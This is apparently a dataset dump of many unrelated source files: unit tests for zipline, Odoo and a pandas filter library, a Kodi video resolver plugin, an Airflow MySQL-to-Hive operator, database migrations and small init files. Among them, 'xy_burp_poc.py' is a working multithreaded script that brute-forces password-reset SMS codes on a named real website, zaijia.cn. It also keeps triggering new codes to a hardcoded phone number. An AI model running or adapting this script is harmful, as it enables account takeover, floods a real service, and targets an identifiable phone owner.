repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
dkushner/zipline
|
refs/heads/master
|
tests/test_exception_handling.py
|
20
|
#
# Copyright 2013 Quantopian, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from unittest import TestCase
import zipline.utils.simfactory as simfactory
import zipline.utils.factory as factory
from zipline.test_algorithms import (
ExceptionAlgorithm,
DivByZeroAlgorithm,
SetPortfolioAlgorithm,
)
from zipline.finance.slippage import FixedSlippage
from zipline.utils.test_utils import (
drain_zipline,
setup_logger,
teardown_logger,
ExceptionSource,
)
DEFAULT_TIMEOUT = 15 # seconds
EXTENDED_TIMEOUT = 90
class ExceptionTestCase(TestCase):
def setUp(self):
self.zipline_test_config = {
'sid': 133,
'slippage': FixedSlippage()
}
setup_logger(self)
def tearDown(self):
teardown_logger(self)
def test_datasource_exception(self):
self.zipline_test_config['trade_source'] = ExceptionSource()
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(ZeroDivisionError):
output, _ = drain_zipline(self, zipline)
def test_exception_in_handle_data(self):
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
ExceptionAlgorithm(
'handle_data',
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(Exception) as ctx:
output, _ = drain_zipline(self, zipline)
self.assertEqual(str(ctx.exception),
'Algo exception in handle_data')
def test_zerodivision_exception_in_handle_data(self):
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
DivByZeroAlgorithm(
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(ZeroDivisionError):
output, _ = drain_zipline(self, zipline)
def test_set_portfolio(self):
"""
Are we protected against overwriting an algo's portfolio?
"""
# Simulation
# ----------
self.zipline_test_config['algorithm'] = \
SetPortfolioAlgorithm(
self.zipline_test_config['sid'],
sim_params=factory.create_simulation_parameters()
)
zipline = simfactory.create_test_zipline(
**self.zipline_test_config
)
with self.assertRaises(AttributeError):
output, _ = drain_zipline(self, zipline)
|
Antiun/odoo
|
refs/heads/8.0
|
openerp/addons/base/tests/test_ir_filters.py
|
64
|
# -*- coding: utf-8 -*-
import functools
from openerp import exceptions
from openerp.tests import common
def noid(d):
""" Removes values that are not relevant for the test comparisons """
d.pop('id', None)
d.pop('action_id', None)
return d
class FiltersCase(common.TransactionCase):
def build(self, model, *args):
Model = self.registry(model)
for vars in args:
Model.create(self.cr, common.ADMIN_USER_ID, vars, {})
class TestGetFilters(FiltersCase):
def setUp(self):
super(TestGetFilters, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_own_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=self.USER_ID, model_id='ir.filters'))
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='b', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=self.USER, domain='[]', context='{}'),
dict(name='d', is_default=False, user_id=self.USER, domain='[]', context='{}'),
])
def test_global_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
dict(name='c', user_id=False, model_id='ir.filters'),
dict(name='d', user_id=False, model_id='ir.filters'),
)
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='b', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='d', is_default=False, user_id=False, domain='[]', context='{}'),
])
def test_no_third_party_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=common.ADMIN_USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=common.ADMIN_USER_ID, model_id='ir.filters') )
filters = self.registry('ir.filters').get_filters(
self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}'),
dict(name='c', is_default=False, user_id=self.USER, domain='[]', context='{}'),
])
class TestOwnDefaults(FiltersCase):
def setUp(self):
super(TestOwnDefaults, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_new_no_filter(self):
"""
When creating a @is_default filter with no existing filter, that new
filter gets the default flag
"""
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=True,
domain='[]', context='{}')
])
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=self.USER, is_default=True, domain='[]', context='{}'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, the flag should be *moved* from the old to the new filter
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=self.USER, is_default=True, domain='[]', context='{}'),
])
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if an other filter
already has the flag the flag should be moved
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=self.USER, is_default=True, domain='[]', context='{}'),
dict(name='b', user_id=self.USER, is_default=False, domain='[]', context='{}'),
])
class TestGlobalDefaults(FiltersCase):
def setUp(self):
super(TestGlobalDefaults, self).setUp()
self.USER = self.registry('res.users').name_search(self.cr, self.uid, 'demo')[0]
self.USER_ID = self.USER[0]
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='c', user_id=False, is_default=True, domain='[]', context='{}'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if an other filter
already has the flag an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'a',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_default_filter(self):
"""
Replacing the current default global filter should not generate any error
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.registry('ir.filters')
context_value = "{'some_key': True}"
Filters.create_or_replace(self.cr, self.USER_ID, {
'name': 'b',
'model_id': 'ir.filters',
'user_id': False,
'context': context_value,
'is_default': True,
})
filters = Filters.get_filters(self.cr, self.USER_ID, 'ir.filters')
self.assertItemsEqual(map(noid, filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}'),
dict(name='b', user_id=False, is_default=True, domain='[]', context=context_value),
])
from openerp.tests.common import TransactionCase
class TestReadGroup(TransactionCase):
"""Test function read_group with groupby on a many2one field to a model
(in test, "user_id" to "res.users") which is ordered by an inherited not stored field (in
test, "name" inherited from "res.partners").
"""
def setUp(self):
super(TestReadGroup, self).setUp()
self.ir_filters_model = self.env['ir.filters']
self.res_partner_model = self.env['res.partner']
self.res_users_model = self.env['res.users']
def test_read_group_1(self):
self.assertEqual(self.res_users_model._order, "name, login", "Model res.users must be ordered by name, login")
self.assertFalse(self.res_users_model._fields['name'].store, "Field name is not stored in res.users")
filter_a = self.ir_filters_model.create(dict(name="Filter_A", model_id="ir.filters"))
filter_b = self.ir_filters_model.create(dict(name="Filter_B", model_id="ir.filters"))
filter_b.write(dict(user_id=False))
res = self.ir_filters_model.read_group([], ['name', 'user_id'], ['user_id'])
self.assertTrue(any(val['user_id'] == False for val in res), "At least one group must contain val['user_id'] == False.")
|
dezounet/datadez
|
refs/heads/master
|
tests/test_filter.py
|
1
|
from __future__ import unicode_literals, print_function
import unittest
from collections import defaultdict
import numpy as np
import pandas as pd
from datadez.filter import filter_small_occurrence
from datadez.filter import filter_empty
class TestFilter(unittest.TestCase):
def setUp(self):
self.df = pd.DataFrame({
'numeric': [1, 2, 3, 4, 5],
'mono-label': ['A', 'A', 'B', np.nan, 'C'],
'multi-label': [['A'], ['A', 'B'], ['B'], [], ['A', 'C', 'D']],
})
def test_filter_occurences_mono_label(self):
df = filter_small_occurrence(self.df, 'mono-label', 2)
# Check rows has not been removed
self.assertEqual(len(df), len(self.df))
# Check occurrences are as expected
occurrences = df['mono-label'].value_counts(dropna=False)
self.assertEqual(occurrences['A'], 2)
self.assertEqual(occurrences.loc[occurrences.index.isnull()].values, 3)
self.assertListEqual(df['mono-label'].tolist(), ['A', 'A', np.nan, np.nan, np.nan])
def test_filter_occurrences_multi_label(self):
df = filter_small_occurrence(self.df, 'multi-label', 3)
# Check rows has not been removed
self.assertEqual(len(df), len(self.df))
occurrences = defaultdict(int)
for entry in df['multi-label']:
for label in entry:
occurrences[label] += 1
# Check occurrences are as expected
self.assertEqual(len(occurrences), 1)
self.assertEqual(occurrences['A'], 3)
self.assertListEqual(df['multi-label'].tolist(), [['A'], ['A'], [], [], ['A']])
def test_filter_empty_mono_label(self):
df = filter_empty(self.df, ['mono-label'])
# Empty row for column 'mono-label' is filtered
self.assertEqual(len(df), 4)
self.assertListEqual(df['mono-label'].tolist(), ['A', 'A', 'B', 'C'])
def test_filter_empty_multi_label(self):
df = filter_empty(self.df, ['multi-label'])
# Empty row for column 'multi-label' is filtered
self.assertEqual(len(df), 4)
self.assertListEqual(df['multi-label'].tolist(), [['A'], ['A', 'B'], ['B'], ['A', 'C', 'D']])
if __name__ == "__main__":
unittest.main()
|
dogukantufekci/workplace_saas
|
refs/heads/master
|
workplace_saas/_apps/projects/__init__.py
|
12133432
| |
mapr/hue
|
refs/heads/hue-3.9.0-mapr
|
desktop/core/ext-py/Django-1.6.10/tests/select_related_regress/__init__.py
|
12133432
| |
Qalthos/ansible
|
refs/heads/devel
|
test/units/modules/net_tools/nios/__init__.py
|
12133432
| |
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.module.urlresolver/lib/urlresolver/plugins/vidbull.py
|
3
|
'''
Vidbull urlresolver plugin
Copyright (C) 2013 Vinnydude
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from t0mm0.common.net import Net
from urlresolver.plugnplay.interfaces import UrlResolver
from urlresolver.plugnplay.interfaces import PluginSettings
from urlresolver.plugnplay import Plugin
import re, urllib2, os
from urlresolver import common
from lib import jsunpack
#SET ERROR_LOGO# THANKS TO VOINAGE, BSTRDMKR, ELDORADO
error_logo = os.path.join(common.addon_path, 'resources', 'images', 'redx.png')
net = Net()
class VidbullResolver(Plugin, UrlResolver, PluginSettings):
implements = [UrlResolver, PluginSettings]
name = "vidbull"
def __init__(self):
p = self.get_setting('priority') or 100
self.priority = int(p)
self.net = Net()
def get_media_url(self, host, media_id):
try:
url = self.get_url(host, media_id)
html = self.net.http_GET(url).content
data = {}
html = re.search('<Form(.+?)/Form', html, re.DOTALL).group(1)
r = re.findall(r'type="hidden"\s*name="(.+?)"\s*value="(.+?)"', html)
for name, value in r:
data[name] = value
common.addon.show_countdown(4, title='Vidbull', text='Loading Video...')
html = net.http_POST(url, data).content
sPattern = '<script type=(?:"|\')text/javascript(?:"|\')>eval\(function\(p,a,c,k,e,[dr]\)(?!.+player_ads.+).+?</script>'
r = re.search(sPattern, html, re.DOTALL + re.IGNORECASE)
if r:
sJavascript = r.group()
sUnpacked = jsunpack.unpack(sJavascript)
stream_url = re.search('[^\w\.]file[\"\']?\s*[:,]\s*[\"\']([^\"\']+)', sUnpacked)
if stream_url:
return stream_url.group(1)
raise Exception ('File Not Found or removed')
except urllib2.URLError, e:
common.addon.log_error(self.name + ': got http error %d fetching %s' %
(e.code, web_url))
common.addon.show_small_popup('Error','Http error: '+str(e), 8000, error_logo)
return self.unresolvable(code=3, msg=e)
except Exception, e:
common.addon.log('**** Vidbull Error occured: %s' % e)
common.addon.show_small_popup(title='[B][COLOR white]VIDBULL[/COLOR][/B]', msg='[COLOR red]%s[/COLOR]' % e, delay=5000, image=error_logo)
return self.unresolvable(code=0, msg=e)
def get_url(self, host, media_id):
return 'http://www.vidbull.com/%s' % media_id
def get_host_and_id(self, url):
r = re.search('//(.+?)/(?:embed-)?([0-9a-zA-Z]+)',url)
if r:
return r.groups()
else:
return False
return('host', 'media_id')
def valid_url(self, url, host):
if self.get_setting('enabled') == 'false': return False
return (re.match('http://(www.)?vidbull.com/(?:embed-)?' +
'[0-9A-Za-z]+', url) or
'vidbull' in host)
|
airbnb/airflow
|
refs/heads/master
|
airflow/providers/apache/hive/transfers/mysql_to_hive.py
|
7
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""This module contains operator to move data from MySQL to Druid."""
from collections import OrderedDict
from tempfile import NamedTemporaryFile
from typing import Dict, Optional
import MySQLdb
import unicodecsv as csv
from airflow.models import BaseOperator
from airflow.providers.apache.hive.hooks.hive import HiveCliHook
from airflow.providers.mysql.hooks.mysql import MySqlHook
from airflow.utils.decorators import apply_defaults
class MySqlToHiveOperator(BaseOperator):
"""
Moves data from MySql to Hive. The operator runs your query against
MySQL, stores the file locally before loading it into a Hive table.
If the ``create`` or ``recreate`` arguments are set to ``True``,
a ``CREATE TABLE`` and ``DROP TABLE`` statements are generated.
Hive data types are inferred from the cursor's metadata. Note that the
table generated in Hive uses ``STORED AS textfile``
which isn't the most efficient serialization format. If a
large amount of data is loaded and/or if the table gets
queried considerably, you may want to use this operator only to
stage the data into a temporary table before loading it into its
final destination using a ``HiveOperator``.
:param sql: SQL query to execute against the MySQL database. (templated)
:type sql: str
:param hive_table: target Hive table, use dot notation to target a
specific database. (templated)
:type hive_table: str
:param create: whether to create the table if it doesn't exist
:type create: bool
:param recreate: whether to drop and recreate the table at every
execution
:type recreate: bool
:param partition: target partition as a dict of partition columns
and values. (templated)
:type partition: dict
:param delimiter: field delimiter in the file
:type delimiter: str
:param quoting: controls when quotes should be generated by csv writer,
It can take on any of the csv.QUOTE_* constants.
:type quoting: str
:param quotechar: one-character string used to quote fields
containing special characters.
:type quotechar: str
:param escapechar: one-character string used by csv writer to escape
the delimiter or quotechar.
:type escapechar: str
:param mysql_conn_id: source mysql connection
:type mysql_conn_id: str
:param hive_conn_id: destination hive connection
:type hive_conn_id: str
:param tblproperties: TBLPROPERTIES of the hive table being created
:type tblproperties: dict
"""
template_fields = ('sql', 'partition', 'hive_table')
template_ext = ('.sql',)
ui_color = '#a0e08c'
@apply_defaults
def __init__( # pylint: disable=too-many-arguments
self,
*,
sql: str,
hive_table: str,
create: bool = True,
recreate: bool = False,
partition: Optional[Dict] = None,
delimiter: str = chr(1),
quoting: Optional[str] = None,
quotechar: str = '"',
escapechar: Optional[str] = None,
mysql_conn_id: str = 'mysql_default',
hive_cli_conn_id: str = 'hive_cli_default',
tblproperties: Optional[Dict] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.sql = sql
self.hive_table = hive_table
self.partition = partition
self.create = create
self.recreate = recreate
self.delimiter = str(delimiter)
self.quoting = quoting or csv.QUOTE_MINIMAL
self.quotechar = quotechar
self.escapechar = escapechar
self.mysql_conn_id = mysql_conn_id
self.hive_cli_conn_id = hive_cli_conn_id
self.partition = partition or {}
self.tblproperties = tblproperties
@classmethod
def type_map(cls, mysql_type: int) -> str:
"""Maps MySQL type to Hive type."""
types = MySQLdb.constants.FIELD_TYPE
type_map = {
types.BIT: 'INT',
types.DECIMAL: 'DOUBLE',
types.NEWDECIMAL: 'DOUBLE',
types.DOUBLE: 'DOUBLE',
types.FLOAT: 'DOUBLE',
types.INT24: 'INT',
types.LONG: 'BIGINT',
types.LONGLONG: 'DECIMAL(38,0)',
types.SHORT: 'INT',
types.TINY: 'SMALLINT',
types.YEAR: 'INT',
types.TIMESTAMP: 'TIMESTAMP',
}
return type_map.get(mysql_type, 'STRING')
def execute(self, context: Dict[str, str]):
hive = HiveCliHook(hive_cli_conn_id=self.hive_cli_conn_id)
mysql = MySqlHook(mysql_conn_id=self.mysql_conn_id)
self.log.info("Dumping MySQL query results to local file")
conn = mysql.get_conn()
cursor = conn.cursor()
cursor.execute(self.sql)
with NamedTemporaryFile("wb") as f:
csv_writer = csv.writer(
f,
delimiter=self.delimiter,
quoting=self.quoting,
quotechar=self.quotechar,
escapechar=self.escapechar,
encoding="utf-8",
)
field_dict = OrderedDict()
for field in cursor.description:
field_dict[field[0]] = self.type_map(field[1])
csv_writer.writerows(cursor)
f.flush()
cursor.close()
conn.close()
self.log.info("Loading file into Hive")
hive.load_file(
f.name,
self.hive_table,
field_dict=field_dict,
create=self.create,
partition=self.partition,
delimiter=self.delimiter,
recreate=self.recreate,
tblproperties=self.tblproperties,
)
|
gnieboer/tensorflow
|
refs/heads/master
|
tensorflow/contrib/stateless/__init__.py
|
48
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Stateless random ops which take seed as a tensor input.
Instead of taking `seed` as an attr which initializes a mutable state within
the op, these random ops take `seed` as an input, and the random numbers are
a deterministic function of `shape` and `seed`.
WARNING: These ops are in contrib, and are not stable. They should be
consistent across multiple runs on the same hardware, but only for the same
version of the code.
@@stateless_random_uniform
@@stateless_random_normal
@@stateless_truncated_normal
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=wildcard-import
from tensorflow.contrib.stateless.gen_stateless_random_ops import *
from tensorflow.python.util.all_util import remove_undocumented
remove_undocumented(__name__)
|
xflows/clowdflows-backend
|
refs/heads/master
|
workflows/migrations/0004_widget_interaction_finished.py
|
1
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-10-03 08:11
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('workflows', '0003_auto_20160825_1107'),
]
operations = [
migrations.AddField(
model_name='widget',
name='interaction_finished',
field=models.BooleanField(default=False),
),
]
|
JianyuWang/nova
|
refs/heads/master
|
nova/api/openstack/compute/multiple_create.py
|
6
|
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from webob import exc
from nova.api.openstack.compute.schemas import multiple_create as \
schema_multiple_create
from nova.api.openstack import extensions
from nova.i18n import _
ALIAS = "os-multiple-create"
MIN_ATTRIBUTE_NAME = "min_count"
MAX_ATTRIBUTE_NAME = "max_count"
RRID_ATTRIBUTE_NAME = "return_reservation_id"
class MultipleCreate(extensions.V21APIExtensionBase):
"""Allow multiple create in the Create Server v2.1 API."""
name = "MultipleCreate"
alias = ALIAS
version = 1
def get_resources(self):
return []
def get_controller_extensions(self):
return []
# use nova.api.extensions.server.extensions entry point to modify
# server create kwargs
# NOTE(gmann): This function is not supposed to use 'body_deprecated_param'
# parameter as this is placed to handle scheduler_hint extension for V2.1.
def server_create(self, server_dict, create_kwargs, body_deprecated_param):
# min_count and max_count are optional. If they exist, they may come
# in as strings. Verify that they are valid integers and > 0.
# Also, we want to default 'min_count' to 1, and default
# 'max_count' to be 'min_count'.
min_count = int(server_dict.get(MIN_ATTRIBUTE_NAME, 1))
max_count = int(server_dict.get(MAX_ATTRIBUTE_NAME, min_count))
return_id = server_dict.get(RRID_ATTRIBUTE_NAME, False)
if min_count > max_count:
msg = _('min_count must be <= max_count')
raise exc.HTTPBadRequest(explanation=msg)
create_kwargs['min_count'] = min_count
create_kwargs['max_count'] = max_count
create_kwargs['return_reservation_id'] = return_id
def get_server_create_schema(self):
return schema_multiple_create.server_create
|
hickford/cython
|
refs/heads/master
|
Doc/s5/ep2008/worker.py
|
33
|
class HardWorker(object):
u"Almost Sisyphus"
def __init__(self, task):
self.task = task
def work_hard(self):
for i in range(100):
self.task()
|
hijinks/python-bcet
|
refs/heads/master
|
random_points.py
|
1
|
#!/usr/bin/env python
# Use pixel difference and Kirsch filter to pick series of random points
import georasters as gr
import numpy as np
import matplotlib.pyplot as plt
from scipy import ndimage
import random
import string
import csv
diff_gr = gr.from_file('./output/diff.tif')
ndv, xsize, ysize, geot, projection, datatype = gr.get_geo_info('./output/diff.tif') # Raster information
edge_gr = gr.from_file('./output/k100.tif')
raster_bounds = diff_gr.bounds
lat_range = np.linspace(raster_bounds[0]+10, raster_bounds[2]-10, num=xsize, endpoint=False, retstep=False, dtype=float)
lon_range = np.linspace(raster_bounds[1]+10, raster_bounds[3]-10, num=ysize, endpoint=False, retstep=False, dtype=float)
npz = np.zeros(diff_gr.raster.shape)
npz[np.where(edge_gr.raster < 1)] = 1
npz[np.where(diff_gr.raster > 20)] = 0
npd = ndimage.binary_erosion(npz, iterations=1)
npd = npd+1
npd[np.where(diff_gr.raster < 1)] = 0
npd_gr = gr.GeoRaster(npd,
diff_gr.geot,
nodata_value=ndv,
projection=diff_gr.projection,
datatype=diff_gr.datatype)
npd_gr.to_tiff('./npd')
lon_random = np.random.choice(ysize, 20000)
lat_random = np.random.choice(xsize, 20000)
random_coords = np.vstack((lat_random,lon_random)).transpose()
random_coords_unique = np.vstack(tuple(row) for row in random_coords)
def valid_point(v):
if v > 1:
return True
i = 0
p = 0
with open('random_points3.csv', 'wb') as csvfile:
csvw = csv.writer(csvfile, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
csvw.writerow(['Latitude', 'Longitude', 'Name'])
while p < 1000:
coord_r = random_coords_unique[i]
coord_lat = lat_range[coord_r[0]]
coord_lon = lon_range[coord_r[1]]
print([coord_lat,coord_lon])
if valid_point(npd_gr.map_pixel(coord_lat,coord_lon)):
label = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(6))
csvw.writerow([coord_lat, coord_lon, label])
p = p+1
i = i+1
|
xujun10110/Hammer
|
refs/heads/master
|
bin/xy_burp_poc.py
|
3
|
#!/usr/bin/python2.7
#coding:utf-8
import sys
import time
import requests
from concurrent import futures
phone = '+86-15869103136'
agent = 'Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16'
headers = {'User-Agent':agent}
def refreshCode():
url = 'http://www.zaijia.cn/user/password/sendSmsCode'
data={'phone':phone}
while True:
for i in range(5):
try:
a = requests.post(url,data=data,headers=headers)
if a.status_code == 200:
print 'refresh code success'
break
except Exception, e:
raise e
time.sleep(60*5) # 5分钟发送一次
def burpCode(code):
url = 'http://www.zaijia.cn/user/password/checkCode'
data = {'phone':phone,'sms_code':code}
for i in range(5):
try:
a = requests.post(url,data=data,headers=headers)
if a.status_code == 200 and 'true' in a.text:
print code,'success'
sys.exit()
else:
print code,'fail'
break
# exceptions cased by multi threads
except Exception,e:
print 'Exception',e
pass
def main():
# fs = {}
with futures.ThreadPoolExecutor(max_workers=100) as executor: #默认10线程
time.clock()
executor.submit(refreshCode)
time.sleep(1)
for i in xrange(130000,134800):
future = executor.submit(burpCode,str(i))
print time.clock()
# ----------------------------------------------------------------------------------------------------
#
# ----------------------------------------------------------------------------------------------------
if __name__=='__main__':
main()
# burpCode('134780')
pass
|
paulcalabro/zato
|
refs/heads/master
|
code/alembic/versions/0017_7baa0602_gh283_update_tls_outconns.py
|
7
|
"""gh283 update tls outconns
Revision ID: 0017_7baa0602
Revises: 0016_6669bb02
Create Date: 2014-07-18 14:47:05
"""
# revision identifiers, used by Alembic.
revision = '0017_7baa0602'
down_revision = '0016_6669bb02'
from alembic import op
import sqlalchemy as sa
# Zato
from zato.common.odb import model
# ################################################################################################################################
def upgrade():
op.drop_column(model.TLSKeyCertSecurity.__tablename__, 'cert_cn')
op.add_column(model.TLSKeyCertSecurity.__tablename__, sa.Column('cert_subject', sa.String(1200), nullable=False))
op.drop_constraint('sec_tls_key_cert_id_fkey', model.TLSKeyCertSecurity.__tablename__)
op.create_foreign_key('sec_tls_key_cert_id_fkey', model.TLSKeyCertSecurity.__tablename__, 'sec_base', ['id'], ['id'])
def downgrade():
op.drop_column(model.TLSKeyCertSecurity.__tablename__, 'cert_subject')
op.add_column(model.TLSKeyCertSecurity.__tablename__, sa.Column('cert_cn', sa.String(1200), nullable=False))
|
nazrulworld/mailbox
|
refs/heads/master
|
run.py
|
12133432
| |
pdellaert/ansible
|
refs/heads/devel
|
hacking/build_library/__init__.py
|
12133432
| |
arun6582/django
|
refs/heads/master
|
tests/null_fk/__init__.py
|
12133432
| |
naterh/ironic
|
refs/heads/master
|
ironic/common/glance_service/v1/__init__.py
|
12133432
| |
LibreGameArchive/silvertree
|
refs/heads/master
|
scons/qt4ng.py
|
1
|
# vi: syntax=python:et:ts=4
from os.path import join, exists
